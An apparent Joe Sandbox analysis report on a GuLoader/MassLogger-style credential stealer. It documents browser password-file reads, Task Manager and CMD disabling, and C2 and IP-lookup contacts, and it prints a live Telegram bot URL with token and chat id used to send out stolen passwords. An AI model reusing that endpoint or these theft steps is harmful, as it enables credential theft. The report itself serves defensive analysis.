            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00406831 LdrInitializeThunk,WideCharToMultiByte,GetProcAddress,0_2_00406831
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_72ED1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_72ED1B5F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeQueries volume information: C:\Users\user\Desktop\b5BQbAhwVD.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: b5BQbAhwVD.exe PID: 6424, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            b5BQbAhwVD.exe76%VirustotalBrowse
            b5BQbAhwVD.exe61%ReversingLabsWin32.Trojan.GuLoader
            b5BQbAhwVD.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.telegramLR0%Avira URL Cloudsafe
            https://api.telegram.orgra0%Avira URL Cloudsafe
            http://checkip.dyndn0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.142
            truefalse
              high
              drive.usercontent.google.com
              172.217.18.97
              truefalse
                high
                reallyfreegeoip.org
                104.21.80.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.orgb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.000000003396B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033957000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A2B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/Kb5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botb5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsb5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegramLRb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://drive.usercontent.google.com/b5BQbAhwVD.exe, 00000003.00000003.2509453504.0000000003241000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2476161231.0000000003248000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2509525856.0000000003246000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.orgb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://nsis.sf.net/NSIS_ErrorErrorb5BQbAhwVD.exefalse
                                              high
                                              https://www.google.comb5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.com/-40f1-ac21-573d1d5ce43fb5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.org/3b5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegramb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://reallyfreegeoip.orgb5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://apis.google.comb5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.comb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://api.telegram.orgb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.google.com/gb5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.telegram.orgrab5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://checkip.dyndnb5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189esb5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.org/xml/b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        132.226.8.169
                                                                        checkip.dyndns.comUnited States
                                                                        16989UTMEMUSfalse
                                                                        149.154.167.220
                                                                        api.telegram.orgUnited Kingdom
                                                                        62041TELEGRAMRUfalse
                                                                        142.250.186.142
                                                                        drive.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        172.217.18.97
                                                                        drive.usercontent.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        158.101.44.242
                                                                        unknownUnited States
                                                                        31898ORACLE-BMC-31898USfalse
                                                                        104.21.80.1
                                                                        reallyfreegeoip.orgUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1588212
                                                                        Start date and time:2025-01-10 22:41:57 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 52s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:6
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:b5BQbAhwVD.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/8@7/6
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 96%
                                                                        • Number of executed functions: 157
                                                                        • Number of non-executed functions: 109
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        TimeTypeDescription
                                                                        16:43:35API Interceptor367348x Sleep call for process: b5BQbAhwVD.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        132.226.8.169UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • checkip.dyndns.org/
                                                                        xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • checkip.dyndns.org/
                                                                        3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        149.154.167.2209Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            reallyfreegeoip.orgUF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.48.1
                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.32.1
                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.48.1
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.80.1
                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.16.1
                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.80.1
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.32.1
                                                                                            upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.48.1
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.16.1
                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.48.1
                                                                                            api.telegram.org9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            checkip.dyndns.comUF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 193.122.130.0
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 193.122.130.0
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRU9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            UTMEMUSUF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.247.73
                                                                                            FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            ORACLE-BMC-31898USVQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 193.122.130.0
                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 193.122.130.0
                                                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 158.101.44.242
                                                                                            xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 158.101.44.242
                                                                                            ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 193.122.6.168
                                                                                            9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 193.122.6.168
                                                                                            y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.130.0
                                                                                            FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            54328bd36c14bd82ddaa0c04b25ed9adUF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.80.1
                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.80.1
                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.80.1
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.80.1
